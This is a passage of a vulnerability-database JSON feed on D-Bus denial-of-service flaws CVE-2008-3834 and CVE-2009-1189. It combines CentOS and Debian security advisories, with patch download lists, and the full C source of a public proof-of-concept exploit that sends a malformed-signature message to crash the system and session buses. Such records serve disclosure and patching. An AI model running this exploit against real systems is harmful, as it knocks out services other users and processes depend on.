&iter2);\n\n\tprintf("[+] connecting to dbus system daemon...\\n");\n\n\tsystem = dbus_bus_get(DBUS_BUS_SYSTEM, NULL);\n\n\tif (system) {\n\t\tprintf("[+] killing dbus system daemon...\\n");\n\n\t\tdbus_connection_send(system, 
message, NULL);\n\t\tdbus_connection_flush(system);\n\t\tdbus_connection_unref(system);\n\t} else {\n\t\tprintf("[-] error: could not connect to dbus system daemon\\n");\n\t}\n\n\tprintf("[+] connecting to dbus session daemon...\\n");\n\n\tsession = dbus_bus_get(DBUS_BUS_SESSION, NULL);\n\n\tif (session) {\n\t\tprintf("[+] killing dbus session daemon...\\n");\n\n\t\tdbus_connection_send(session, message, NULL);\n\t\tdbus_connection_flush(session);\n\t\tdbus_connection_unref(session);\n\t} else {\n\t\tprintf("[-] error: could not connect to dbus session daemon\\n");\n\t}\n\n\tdbus_message_unref(message);\n\n\treturn 0;\n}\n\n// milw0rm.com [2009-01-19]\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-17745", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "centos": [{"lastseen": "2019-12-20T18:28:26", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3834"], "description": "**CentOS Errata and Security Advisory** CESA-2009:0008\n\n\nD-Bus is a system for sending messages between applications. It is used for\nthe system-wide message bus service and as a per-user-login-session\nmessaging facility.\n\nA denial-of-service flaw was discovered in the system for sending messages\nbetween applications. A local user could send a message with a malformed\nsignature to the bus causing the bus (and, consequently, any process using\nlibdbus to receive messages) to abort. (CVE-2008-3834)\n\nAll users are advised to upgrade to these updated dbus packages, which\ncontain backported patch which resolve this issue. 
For the update to take\neffect, all running instances of dbus-daemon and all running applications\nusing the libdbus library must be restarted, or the system rebooted.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-January/027568.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-January/027569.html\n\n**Affected packages:**\ndbus\ndbus-devel\ndbus-x11\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-0008.html", "edition": 3, "modified": "2009-01-08T16:06:25", "published": "2009-01-08T16:06:24", "href": "http://lists.centos.org/pipermail/centos-announce/2009-January/027568.html", "id": "CESA-2009:0008", "title": "dbus security update", "type": "centos", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-20T18:27:17", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1189"], "description": "**CentOS Errata and Security Advisory** CESA-2010:0018\n\n\nD-Bus is a system for sending messages between applications. It is used for\nthe system-wide message bus service and as a per-user-login-session\nmessaging facility.\n\nIt was discovered that the Red Hat Security Advisory RHSA-2009:0008 did\nnot correctly fix the denial of service flaw in the system for sending\nmessages between applications. A local user could use this flaw to send a\nmessage with a malformed signature to the bus, causing the bus (and,\nconsequently, any process using libdbus to receive messages) to abort.\n(CVE-2009-1189)\n\nNote: Users running any application providing services over the system\nmessage bus are advised to test this update carefully before deploying it\nin production environments.\n\nAll users are advised to upgrade to these updated packages, which contain a\nbackported patch to correct this issue. 
For the update to take effect, all\nrunning instances of dbus-daemon and all running applications using the\nlibdbus library must be restarted, or the system rebooted.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/028471.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-January/028472.html\n\n**Affected packages:**\ndbus\ndbus-devel\ndbus-libs\ndbus-x11\n\n**Upstream details at:**\n", "edition": 3, "modified": "2010-01-08T01:04:41", "published": "2010-01-08T01:04:41", "href": "http://lists.centos.org/pipermail/centos-announce/2010-January/028471.html", "id": "CESA-2010:0018", "title": "dbus security update", "type": "centos", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-01T03:08:44", "description": "D-Bus Daemon < 1.2.4 (libdbus) Denial of Service Exploit. CVE-2008-3834. Dos exploits for multiple platform", "published": "2009-01-19T00:00:00", "type": "exploitdb", "title": "D-Bus Daemon < 1.2.4 - libdbus Denial of Service Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3834"], "modified": "2009-01-19T00:00:00", "id": "EDB-ID:7822", "href": "https://www.exploit-db.com/exploits/7822/", "sourceData": "/*\r\n * cve-2008-3834.c\r\n *\r\n * D-Bus Daemon Denial of Service < 1.2.4\r\n * Jon Oberheide <jon@oberheide.org>\r\n * http://jon.oberheide.org\r\n *\r\n * Usage:\r\n *\r\n * $ gcc `pkg-config dbus-1 --cflags` cve-2008-3834.c `pkg-config dbus-1 --libs` -o cve-2008-3834\r\n * $ ./cve-2008-3834\r\n * \r\n * Information:\r\n *\r\n * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3834\r\n *\r\n * The dbus_signature_validate function in the D-bus library (libdbus) \r\n * before 1.2.4 allows remote attackers to cause a denial of service \r\n * (application abort) via a message containing a malformed signature,\r\n * which triggers a failed assertion error. 
\r\n *\r\n */\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <stdint.h>\r\n#include <string.h>\r\n\r\n#include <dbus/dbus.h>\r\n\r\n#define DEST \"org.freedesktop.ExampleService\"\r\n#define NAME \"org.freedesktop.ExampleInterface.ExampleMethod\"\r\n#define PATH \"/org/freedesktop/sample/object/name\"\r\n#define SIGNAL \"ExampleMethod\"\r\n\r\nint\r\nmain(int argc, char *argv[])\r\n{\r\n\tchar sig[8];\r\n\tuint32_t val = 0xdeadbeef;\r\n\tDBusMessage *message;\r\n\tDBusConnection *system, *session;\r\n\tDBusMessageIter iter1, iter2, iter3, iter4;\r\n\r\n\tprintf(\"[+] creating malicious dbus message...\\n\");\r\n\r\n\tmessage = dbus_message_new_signal(PATH, NAME, SIGNAL);\r\n\tif (!message) {\r\n\t\tprintf(\"[-] error: could not create dbus message\\n\");\r\n\t\treturn 1;\r\n\t}\r\n\tif (!dbus_message_set_destination(message, DEST)) {\r\n\t\tprintf(\"[-] error: could not create set dbus destination\\n\");\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tsig[0] = DBUS_DICT_ENTRY_BEGIN_CHAR;\r\n\tsig[1] = DBUS_STRUCT_BEGIN_CHAR;\r\n\tsig[2] = DBUS_TYPE_INT32;\r\n\tsig[3] = DBUS_TYPE_INT32;\r\n\tsig[4] = DBUS_STRUCT_END_CHAR;\r\n\tsig[5] = DBUS_TYPE_INT32;\r\n\tsig[6] = DBUS_DICT_ENTRY_END_CHAR;\r\n\tsig[7] = '\\0';\r\n\r\n\tdbus_message_iter_init_append(message, &iter1);\r\n\tdbus_message_iter_open_container(&iter1, DBUS_TYPE_ARRAY, sig, &iter2);\r\n\tdbus_message_iter_open_container(&iter2, DBUS_TYPE_DICT_ENTRY, NULL, &iter3);\r\n\tdbus_message_iter_open_container(&iter3, DBUS_TYPE_STRUCT, NULL, &iter4);\r\n\tdbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);\r\n\tdbus_message_iter_append_basic(&iter4, DBUS_TYPE_INT32, &val);\r\n\tdbus_message_iter_close_container(&iter3, &iter4);\r\n\tdbus_message_iter_append_basic(&iter3, DBUS_TYPE_INT32, &val);\r\n\tdbus_message_iter_close_container(&iter2, &iter3);\r\n\tdbus_message_iter_close_container(&iter1, &iter2);\r\n\r\n\tprintf(\"[+] connecting to dbus system daemon...\\n\");\r\n\r\n\tsystem = 
dbus_bus_get(DBUS_BUS_SYSTEM, NULL);\r\n\r\n\tif (system) {\r\n\t\tprintf(\"[+] killing dbus system daemon...\\n\");\r\n\r\n\t\tdbus_connection_send(system, message, NULL);\r\n\t\tdbus_connection_flush(system);\r\n\t\tdbus_connection_unref(system);\r\n\t} else {\r\n\t\tprintf(\"[-] error: could not connect to dbus system daemon\\n\");\r\n\t}\r\n\r\n\tprintf(\"[+] connecting to dbus session daemon...\\n\");\r\n\r\n\tsession = dbus_bus_get(DBUS_BUS_SESSION, NULL);\r\n\r\n\tif (session) {\r\n\t\tprintf(\"[+] killing dbus session daemon...\\n\");\r\n\r\n\t\tdbus_connection_send(session, message, NULL);\r\n\t\tdbus_connection_flush(session);\r\n\t\tdbus_connection_unref(session);\r\n\t} else {\r\n\t\tprintf(\"[-] error: could not connect to dbus session daemon\\n\");\r\n\t}\r\n\r\n\tdbus_message_unref(message);\r\n\r\n\treturn 0;\r\n}\r\n\r\n// milw0rm.com [2009-01-19]\r\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/7822/"}], "debian": [{"lastseen": "2020-11-11T13:23:48", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3834"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1658-1 security@debian.org\nhttp://www.debian.org/security/ Thijs Kinkhorst\nOctober 22, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : dbus\nVulnerability : programming error\nProblem type : local\nDebian-specific: no\nCVE Id(s) : CVE-2008-3834\nDebian Bug : 501443\n\nColin Walters discovered that the dbus_signature_validate function in \ndbus, a simple interprocess messaging system, is prone to a denial of \nservice attack.\n\nFor the stable distribution (etch), this problem has been fixed in \nversion 1.0.2-1+etch2.\n\nFor the testing distribution (lenny) and unstable distribution (sid) \nthis problem will be fixed soon.\n\nWe recommend that you 
upgrade your dbus package.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2.dsc\n Size/MD5 checksum: 824 476bb3df500c50f67b4088317482e0ef\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2.diff.gz\n Size/MD5 checksum: 19909 27df2fd0bc5cb93069d6c10d89e0214a\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2.orig.tar.gz\n Size/MD5 checksum: 1400278 0552a9b54beb4a044951b7cdbc8fc855\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-doc_1.0.2-1+etch2_all.deb\n Size/MD5 checksum: 1623126 68e4e1787515928f95af670ec2677663\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch2_alpha.deb\n Size/MD5 checksum: 403640 fa77ef6e2fc986018a1b6074b3ae9343\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch2_alpha.deb\n Size/MD5 checksum: 184728 631b1a1ed1215eb05a696b40a72db26c\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2_alpha.deb\n Size/MD5 checksum: 378152 662bea6b7c1db00fdf933b53a2334f7d\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch2_alpha.deb\n Size/MD5 checksum: 289022 3ebba7555c92b42fdfe9331c35fbafc6\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch2_amd64.deb\n Size/MD5 checksum: 279202 
dfbd440a6a800eea8ba2e46b692dd636\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch2_amd64.deb\n Size/MD5 checksum: 348548 ccc32fdddbaca40a7e62cffc250d493a\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2_amd64.deb\n Size/MD5 checksum: 363840 fd13ad30b922eff52503762ba60d08e0\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch2_amd64.deb\n Size/MD5 checksum: 184096 cb1028347d48476de045ad633939119a\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch2_arm.deb\n Size/MD5 checksum: 331110 508d164df564a28f626b1941bf784bcd\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch2_arm.deb\n Size/MD5 checksum: 183846 34fc9addad9e6e1858107a9382fc89e4\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2_arm.deb\n Size/MD5 checksum: 343302 dd43eeb35c44bb838d45d6324f9842fb\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch2_arm.deb\n Size/MD5 checksum: 265858 e2438b408ec289d96454d30c971a1eeb\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch2_hppa.deb\n Size/MD5 checksum: 184866 7b0aa00c72398485849a46c3a376b5a3\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2_hppa.deb\n Size/MD5 checksum: 375644 6146db75333cc23bcf98184886e2358f\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch2_hppa.deb\n Size/MD5 checksum: 362346 5002551bf82c33092fdd3fee8356078d\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch2_hppa.deb\n Size/MD5 checksum: 285994 55964151812beb09104dadc5fe883ded\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch2_i386.deb\n Size/MD5 checksum: 335874 116b0084af4713242092e2b07a64734f\n 
http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2_i386.deb\n Size/MD5 checksum: 349844 cfa20eea1e6e8be195d520199e8415c6\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch2_i386.deb\n Size/MD5 checksum: 184284 98c8270b762a20bffc194124562c2a68\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch2_i386.deb\n Size/MD5 checksum: 269032 ebf1993ab8d40f4d10becd43324c3fb7\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2_ia64.deb\n Size/MD5 checksum: 439328 0e4d4761c026e5d1a1d0fec1a2e2cc59\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch2_ia64.deb\n Size/MD5 checksum: 186576 9a83ca03b18ba3bbaa0e976c73e5ee49\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch2_ia64.deb\n Size/MD5 checksum: 411494 c4e44af1f20c10c57205270249f337a9\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch2_ia64.deb\n Size/MD5 checksum: 322378 94081937e3524ee2faecb311d0b55772\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2_mips.deb\n Size/MD5 checksum: 370622 4bdcd5653af2b8d82005e4f517b9b4b4\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch2_mips.deb\n Size/MD5 checksum: 183866 413cae07b1a9058a0c6aebdd7f8ea027\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch2_mips.deb\n Size/MD5 checksum: 272250 6d0e938439d3eb8ca62606630b8c3703\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch2_mips.deb\n Size/MD5 checksum: 359500 7f221dd76f85d4ba43e2f9de932a0e2d\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch2_mipsel.deb\n Size/MD5 checksum: 184158 fb889a6d77b704244d791a6eacc6bdd7\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2_mipsel.deb\n 
Size/MD5 checksum: 369594 90c29c9d9647268f0b44b94a01de0f45\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch2_mipsel.deb\n Size/MD5 checksum: 358738 cd6052fccfc4fefdda2ca7bf42823922\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch2_mipsel.deb\n Size/MD5 checksum: 272356 c61c0d2c433d4300df31bc681d0d0edd\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch2_powerpc.deb\n Size/MD5 checksum: 271688 b4fa35b2b6d5d106043064b321c62ff7\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2_powerpc.deb\n Size/MD5 checksum: 353198 192e72c7dabd1d8d7b64a755293969b9\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch2_powerpc.deb\n Size/MD5 checksum: 184192 0a4598f9d41f45a4f8d99982258bc352\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch2_powerpc.deb\n Size/MD5 checksum: 335480 4267b587cd7d75ea76dc36ec679bb2d6\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch2_s390.deb\n Size/MD5 checksum: 355016 839cfa24a74c834cba9161faaf7621e0\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch2_s390.deb\n Size/MD5 checksum: 285310 d7265f270c738d91c19bfaeeff8130a7\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch2_s390.deb\n Size/MD5 checksum: 184598 86f3ad1f997139c8f2c18105417f369b\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2_s390.deb\n Size/MD5 checksum: 373294 8e8fbab4cf0f0214dbd64e6faaf1a87a\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch2_sparc.deb\n Size/MD5 checksum: 340024 74d40edc715045d8693421b4093168c8\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch2_sparc.deb\n Size/MD5 checksum: 184162 32f294e0f8a06390053f8592cfce1f4d\n 
http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch2_sparc.deb\n Size/MD5 checksum: 336182 65adba9662394147aad1d34bb5ac90a4\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch2_sparc.deb\n Size/MD5 checksum: 265080 9d47f318df9648ad5988c36e30d63016\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2008-10-22T19:50:48", "published": "2008-10-22T19:50:48", "id": "DEBIAN:DSA-1658-1:215BD", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00250.html", "title": "[SECURITY] [DSA 1658-1] New dbus packages fix denial of service", "type": "debian", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-11-11T13:30:31", "bulletinFamily": "unix", "cvelist": ["CVE-2009-1189"], "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1837-1 security@debian.org\nhttp://www.debian.org/security/ Steffen Joeris\nJuly 18, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : dbus\nVulnerability : programming error\nProblem type : local\nDebian-specific: no\nCVE Id : CVE-2009-1189\nDebian Bug : 532720\n\n\nIt was discovered that the dbus_signature_validate function in\ndbus, a simple interprocess messaging system, is prone to a denial of\nservice attack. 
This issue was caused by an incorrect fix for\nDSA-1658-1.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 1.2.1-5+lenny1.\n\nFor the oldstable distribution (etch), this problem has been fixed in\nversion 1.0.2-1+etch3.\n\nPackages for ia64 and s390 will be released once they are available.\n\nFor the testing distribution (squeeze) and the unstable distribution\n(sid), this problem has been fixed in version 1.2.14-1.\n\n\nWe recommend that you upgrade your dbus packages.\n\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (oldstable)\n- ------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3.diff.gz\n Size/MD5 checksum: 20482 fd114e50577aade0211a25bc05ac064d\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2.orig.tar.gz\n Size/MD5 checksum: 1400278 0552a9b54beb4a044951b7cdbc8fc855\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3.dsc\n Size/MD5 checksum: 824 0befb91739de13f92197336b6a3f3f06\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-doc_1.0.2-1+etch3_all.deb\n Size/MD5 checksum: 1622204 67e2242179a8af1f3a7363d0d9728702\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_alpha.deb\n Size/MD5 checksum: 289142 
2da5aaed2ca0e1dfe4627f2d51923a1a\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_alpha.deb\n Size/MD5 checksum: 184834 a14af28f5651f06cd41f4aa8b264d486\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_alpha.deb\n Size/MD5 checksum: 378214 95128d7c15be44464dd1a785788fdc3d\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_alpha.deb\n Size/MD5 checksum: 403766 5facc50da806d2f82a1ca839e045035d\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_amd64.deb\n Size/MD5 checksum: 279294 6b0085ce0a01a81a13b068759de269b8\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_amd64.deb\n Size/MD5 checksum: 348654 4d1f1c1d5c074be51b777b93b332eaf7\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_amd64.deb\n Size/MD5 checksum: 363928 54ed19ba7cbd0dd3475827c6e6df5acf\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_amd64.deb\n Size/MD5 checksum: 184200 e5bc33b1e7dbfea9c372a3056e3f1848\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_arm.deb\n Size/MD5 checksum: 343960 e7c6c2269903d8dbd4422103a9e1edaf\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_arm.deb\n Size/MD5 checksum: 265322 4e7ce3fca8c685e540092e70474e6fbd\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_arm.deb\n Size/MD5 checksum: 330958 cee5e85136606605bd290035d9452f90\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_arm.deb\n Size/MD5 checksum: 183240 d7e3c477f4f4fbbc49c04b035e92ff2a\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_hppa.deb\n Size/MD5 checksum: 374136 7d297f74e9fde26e726f06f321208dae\n 
http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_hppa.deb\n Size/MD5 checksum: 286074 0a55d6aa6400d4d5750ebd92e9de7aab\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_hppa.deb\n Size/MD5 checksum: 362166 013680aca7b38c66292a8727855bfc06\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_hppa.deb\n Size/MD5 checksum: 184934 061417fe2e791b5bc7abf62398b3a8a8\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_i386.deb\n Size/MD5 checksum: 335758 605f4f911d8445b74cbd46ede0fcfb89\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_i386.deb\n Size/MD5 checksum: 268688 c64ca51e9e04d1e961a8db7132ba4e08\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_i386.deb\n Size/MD5 checksum: 184134 58672102a58bca326f4ba09c5bf3666a\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_i386.deb\n Size/MD5 checksum: 348012 ae8f836c9e5b631eb421f3b86dc78f49\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_mips.deb\n Size/MD5 checksum: 370052 f8ea51037f985d6b8f2a288b9a813ccd\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_mips.deb\n Size/MD5 checksum: 359844 b0b0956206921cff260c531aa9286f21\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_mips.deb\n Size/MD5 checksum: 184240 4dd808980afe395d6909549614fab214\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_mips.deb\n Size/MD5 checksum: 272764 7ceea85232267e0a80f4fd5cb38ddf09\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_mipsel.deb\n Size/MD5 checksum: 369664 07d0e90fc376acf855563baec0293856\n 
http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_mipsel.deb\n Size/MD5 checksum: 184260 f81b2223f912a359a4fd7bc1f61ba7e4\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_mipsel.deb\n Size/MD5 checksum: 358830 947820464929873955f7f6a427403838\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_mipsel.deb\n Size/MD5 checksum: 272442 3d19769e8260b3d434e6dd577d72c5c0\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_powerpc.deb\n Size/MD5 checksum: 184222 c06ffd6735f13d9f6c9301a0dd487efd\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_powerpc.deb\n Size/MD5 checksum: 335910 9fe78e085108bbacb7f04566247aa51e\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_powerpc.deb\n Size/MD5 checksum: 271718 021c33a25a85bcdc394fc0c5af784256\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_powerpc.deb\n Size/MD5 checksum: 353656 9e40213397ea8306184da6c8e0bcb070\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/d/dbus/dbus-1-utils_1.0.2-1+etch3_sparc.deb\n Size/MD5 checksum: 184266 d82e92039c32386a69e0f1b119820ae8\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-3_1.0.2-1+etch3_sparc.deb\n Size/MD5 checksum: 265144 d7f6e34015d0adc757942c6d1dae3c56\n http://security.debian.org/pool/updates/main/d/dbus/dbus_1.0.2-1+etch3_sparc.deb\n Size/MD5 checksum: 341300 3bb2b297ebd12d562b0185b6b58196a8\n http://security.debian.org/pool/updates/main/d/dbus/libdbus-1-dev_1.0.2-1+etch3_sparc.deb\n Size/MD5 checksum: 337130 1b9530365393919e15ffce3a695441ea\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource 
